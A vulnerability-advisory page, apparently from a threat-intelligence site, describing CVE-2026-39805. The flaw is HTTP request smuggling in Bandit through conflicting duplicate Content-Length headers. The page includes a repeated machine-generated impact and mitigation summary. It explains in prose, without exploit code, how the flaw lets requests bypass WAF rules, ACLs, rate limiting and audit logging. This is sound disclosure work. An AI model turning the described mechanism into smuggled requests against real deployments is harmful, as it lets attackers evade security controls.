CVE-2026-39805: CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in mtrudel bandit
Inconsistent Interpretation of HTTP Requests vulnerability in mtrudel bandit allows HTTP request smuggling via duplicate Content-Length headers. 'Elixir.Bandit.Headers':get_content_length/1 in lib/bandit/headers.ex uses List.keyfind/3, which returns only the first matching header. When a request contains two Content-Length headers with different values, Bandit silently accepts it, uses the first value to read the body, and dispatches the remaining bytes as a second pipelined request on the same keep-alive connection. RFC 9112 §6.3 requires recipients to treat this as an unrecoverable framing error. When Bandit sits behind a proxy that picks the last Content-Length value and forwards the request rather than rejecting it, an unauthenticated attacker can smuggle requests past edge WAF rules, path-based ACLs, rate limiting, and audit logging. This issue affects bandit: before 1.11.0.
AI Analysis
Technical Summary
The vulnerability arises from the Elixir.Bandit.Headers module's get_content_length/1 function, which uses List.keyfind/3 to retrieve only the first Content-Length header in an HTTP request. When two Content-Length headers with differing values are present, Bandit reads the body based on the first header and treats the remaining bytes as a separate pipelined request on the same keep-alive connection. According to RFC 9112 §6.3, this should be treated as an unrecoverable framing error, but Bandit does not enforce this. If Bandit is deployed behind a proxy that selects the last Content-Length header and forwards the request, an attacker can exploit this discrepancy to smuggle HTTP requests past edge security mechanisms, potentially bypassing protections such as WAF rules, path-based ACLs, rate limiting, and audit logging. This issue affects all versions of bandit prior to 1.11.0. The CVSS 4.0 base score is 6.3 (medium severity), reflecting network attack vector, low complexity, partial attack and impact requirements, and no privileges or user interaction needed.
Potential Impact
An unauthenticated attacker can exploit this vulnerability to perform HTTP request smuggling by sending crafted requests with duplicate Content-Length headers. This can lead to bypassing security controls such as web application firewalls, access control lists, rate limiting, and audit logging when Bandit is used behind a proxy that interprets the Content-Length headers differently. The discrepancy in header interpretation can allow malicious requests to be processed undetected or unauthorized requests to reach backend services. There is no indication of direct code execution or data leakage from the provided information.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is released, users should consider deploying Bandit behind proxies or gateways that strictly enforce RFC 9112 §6.3 and reject requests with multiple conflicting Content-Length headers. Additionally, reviewing proxy and WAF configurations to ensure consistent interpretation of HTTP headers can help mitigate exploitation. Monitor vendor channels for updates regarding an official patch or workaround.
CVE-2026-39805: CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') in mtrudel bandit
Description
Inconsistent Interpretation of HTTP Requests vulnerability in mtrudel bandit allows HTTP request smuggling via duplicate Content-Length headers. 'Elixir.Bandit.Headers':get_content_length/1 in lib/bandit/headers.ex uses List.keyfind/3, which returns only the first matching header. When a request contains two Content-Length headers with different values, Bandit silently accepts it, uses the first value to read the body, and dispatches the remaining bytes as a second pipelined request on the same keep-alive connection. RFC 9112 §6.3 requires recipients to treat this as an unrecoverable framing error. When Bandit sits behind a proxy that picks the last Content-Length value and forwards the request rather than rejecting it, an unauthenticated attacker can smuggle requests past edge WAF rules, path-based ACLs, rate limiting, and audit logging. This issue affects bandit: before 1.11.0.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The vulnerability arises from the Elixir.Bandit.Headers module's get_content_length/1 function, which uses List.keyfind/3 to retrieve only the first Content-Length header in an HTTP request. When two Content-Length headers with differing values are present, Bandit reads the body based on the first header and treats the remaining bytes as a separate pipelined request on the same keep-alive connection. According to RFC 9112 §6.3, this should be treated as an unrecoverable framing error, but Bandit does not enforce this. If Bandit is deployed behind a proxy that selects the last Content-Length header and forwards the request, an attacker can exploit this discrepancy to smuggle HTTP requests past edge security mechanisms, potentially bypassing protections such as WAF rules, path-based ACLs, rate limiting, and audit logging. This issue affects all versions of bandit prior to 1.11.0. The CVSS 4.0 base score is 6.3 (medium severity), reflecting network attack vector, low complexity, partial attack and impact requirements, and no privileges or user interaction needed.
Potential Impact
An unauthenticated attacker can exploit this vulnerability to perform HTTP request smuggling by sending crafted requests with duplicate Content-Length headers. This can lead to bypassing security controls such as web application firewalls, access control lists, rate limiting, and audit logging when Bandit is used behind a proxy that interprets the Content-Length headers differently. The discrepancy in header interpretation can allow malicious requests to be processed undetected or unauthorized requests to reach backend services. There is no indication of direct code execution or data leakage from the provided information.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is released, users should consider deploying Bandit behind proxies or gateways that strictly enforce RFC 9112 §6.3 and reject requests with multiple conflicting Content-Length headers. Additionally, reviewing proxy and WAF configurations to ensure consistent interpretation of HTTP headers can help mitigate exploitation. Monitor vendor channels for updates regarding an official patch or workaround.
Technical Details
- Data Version
- 5.2
- Assigner Short Name
- EEF
- Date Reserved
- 2026-04-07T12:28:54.916Z
- Cvss Version
- 4.0
- State
- PUBLISHED
- Remediation Level
- null
Threat ID: 69f5124bcbff5d86105840de
Added to database: 5/1/2026, 8:51:23 PM
Last enriched: 5/1/2026, 9:06:56 PM
Last updated: 5/2/2026, 5:51:00 AM
Views: 12
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.